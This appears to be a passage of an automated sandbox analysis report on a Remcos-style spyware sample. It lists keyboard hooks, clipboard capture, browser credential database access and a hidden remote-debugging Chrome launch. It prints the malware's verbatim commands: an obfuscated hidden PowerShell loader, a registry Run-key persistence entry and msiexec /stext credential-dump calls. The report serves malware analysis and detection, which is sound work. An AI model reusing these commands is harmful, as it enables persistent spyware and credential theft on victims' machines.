              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ulta.com/bag
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.underarmour.com/en-us/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.urbanoutfitters.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.vitalsource.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.walgreens.com/cart/view-ui
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.walmart.com/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wayfair.com/v/checkout/basket/show
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.weightwatchers.com/us/shop/checkout/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.westelm.com/shoppingcart/
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wiley.com/en-us/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.williams-sonoma.com/shoppingcart/
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wish.com/cart
              Source: chrome.exe, 00000008.00000002.144258729862.000012AC00640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258258607.000012AC00510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144262325708.000012AC00D8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
              Source: chrome.exe, 00000008.00000002.144258258607.000012AC00510000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html7
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zappos.com/cart
              Source: chrome.exe, 00000008.00000002.144259430093.000012AC007B3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zazzle.com/co/cart
              Source: chrome.exe, 00000008.00000002.144259430093.000012AC007B3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zennioptical.com/shoppingCart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www2.hm.com/en_us/cart
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60796
              Source: unknown Network traffic detected: HTTP traffic on port 64413 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63505
              Source: unknown Network traffic detected: HTTP traffic on port 59315 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 53091 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 60796 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 60368 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64413
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53091
              Source: unknown Network traffic detected: HTTP traffic on port 57983 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55810
              Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59315
              Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57983
              Source: unknown Network traffic detected: HTTP traffic on port 63505 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 55810 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60368
              Source: unknown HTTPS traffic detected: 104.21.13.139:443 -> 192.168.11.20:49767 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.200.96:443 -> 192.168.11.20:49768 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 40.126.29.12:443 -> 192.168.11.20:49785 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 20.190.135.7:443 -> 192.168.11.20:49786 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Windows\SysWOW64\msiexec.exe Windows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exe
              Source: C:\Users\user\Desktop\rPO3799039985.exe Code function: 0_2_00405086 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard

              E-Banking Fraud

              Source: Yara match File source: 00000004.00000003.144377552368.0000000005496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000003.144377552368.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000003.144376861712.0000000005496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.148899066974.0000000021140000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.148889275088.000000000327F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.148892015439.0000000005496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000003.144376861712.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: msiexec.exe PID: 5024, type: MEMORYSTR
              Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              System Summary

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\rPO3799039985.exe
              Source: C:\Windows\SysWOW64\msiexec.exe Process Stats: CPU usage > 6%
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_214D6FA0 LdrInitializeThunk,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00401806 NtdllDefWindowProc_W
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_004018C0 NtdllDefWindowProc_W
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004016FD NtdllDefWindowProc_A
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004017B7 NtdllDefWindowProc_A
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00402CAC NtdllDefWindowProc_A
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00402D66 NtdllDefWindowProc_A
              Source: C:\Users\user\Desktop\rPO3799039985.exe Code function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
              Source: C:\Users\user\Desktop\rPO3799039985.exe File created: C:\Windows\resources\0409
              Source: C:\Users\user\Desktop\rPO3799039985.exe Code function: 0_2_004048C5
              Source: C:\Users\user\Desktop\rPO3799039985.exe Code function: 0_2_004064CB
              Source: C:\Users\user\Desktop\rPO3799039985.exe Code function: 0_2_00406CA2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0326EAC0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_03269848
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0326EAB0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0773C936
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_214D12CB
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_214DB970
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_21502249
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_214D9AB0
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_214EF57B
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_214D9D20
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_214DED88
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_214DEFB7
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_214E37B0
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_21DF7194
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_21DEB5C1
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_0044B040
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_0043610D
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00447310
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_0044A490
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_0040755A
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_0043C560
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_0044B610
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_0044D6C0
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_004476F0
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_0044B870
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_0044081D
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00414957
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_004079EE
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00407AEB
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_0044AA80
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00412AA9
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00404B74
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00404B03
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_0044BBD8
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00404BE5
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00404C76
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00415CFE
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00416D72
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00446D30
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00446D8B
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00406E8F
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00405038
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0041208C
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004050A9
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0040511A
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0043C13A
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004051AB
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00449300
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0040D322
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044A4F0
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0043A5AB
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00413631
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00446690
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044A730
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004398D8
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004498E0
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044A886
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0043DA09
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00438D5E
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00449ED0
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0041FE83
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00430F54
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_004050C2
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_004014AB
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00405133
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_004051A4
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00401246
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0040CA46
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00405235
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_004032C8
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00401689
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00402F60
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 004169A7 appears 87 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 214DB100 appears 33 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 214DA5A6 appears 36 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00416760 appears 69 times
Source: rPO3799039985.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)"
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@66/149@13/12
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
Source: C:\Users\user\Desktop\rPO3799039985.exe | Code function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\rPO3799039985.exe | Code function: 0_2_00404352 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_214D7890 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,FindWindowExA,GetWindowThreadProcessId,ShowWindow,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\rPO3799039985.exe | Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4248:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7696:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4248:120:WilError_03
Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-HMKDWQ
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7696:304:WilStaging_02
Source: C:\Users\user\Desktop\rPO3799039985.exe | File created: C:\Users\user\AppData\Local\Temp\nsj25A7.tmp
Source: rPO3799039985.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\msiexec.exe | System information queried: HandleInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\Desktop\rPO3799039985.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\rPO3799039985.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: msiexec.exe, msiexec.exe, 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: msiexec.exe, msiexec.exe, 0000000A.00000002.144169374536.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: msiexec.exe, 00000004.00000002.148901215405.0000000021CF0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: msiexec.exe, msiexec.exe, 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: chrome.exe, 00000008.00000002.144252803142.0000022E9C1B0000.00000002.00000001.00040000.00000018.sdmp | Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: msiexec.exe, 00000009.00000003.144186136835.0000000004D43000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.144186581747.0000000004D44000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.144186176288.0000000004D44000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
Source: msiexec.exe, msiexec.exe, 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: msiexec.exe, msiexec.exe, 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: chrome.exe, 00000008.00000002.144252841629.0000022E9C1C5000.00000002.00000001.00040000.00000019.sdmp, chrome.exe, 00000008.00000002.144259830065.000012AC00820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144205896494.000012AC008FC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.144188233630.0000000004D43000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.144187932890.0000000004D2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.144190959145.0000000004D44000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: msiexec.exe, msiexec.exe, 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: msiexec.exe, 00000009.00000003.144183923892.0000000004D37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.144183732529.0000000004D30000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.144183850849.0000000004D31000.00000004.00000020.00020000.00000000.sdmp, Web Data.17.dr | Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
Source: rPO3799039985.exe | Virustotal: Detection: 18%
Source: C:\Users\user\Desktop\rPO3799039985.exe | File read: C:\Users\user\Desktop\rPO3799039985.exe
Source: C:\Windows\SysWOW64\msiexec.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown | Process created: C:\Users\user\Desktop\rPO3799039985.exe "C:\Users\user\Desktop\rPO3799039985.exe"
Source: C:\Users\user\Desktop\rPO3799039985.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)"
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xocgcuufvngxpkogqqu"
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\hihycffzjvycrqdkhbgvqc"
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\rlmjdxqbxdqhcwrorltxbhbpx"
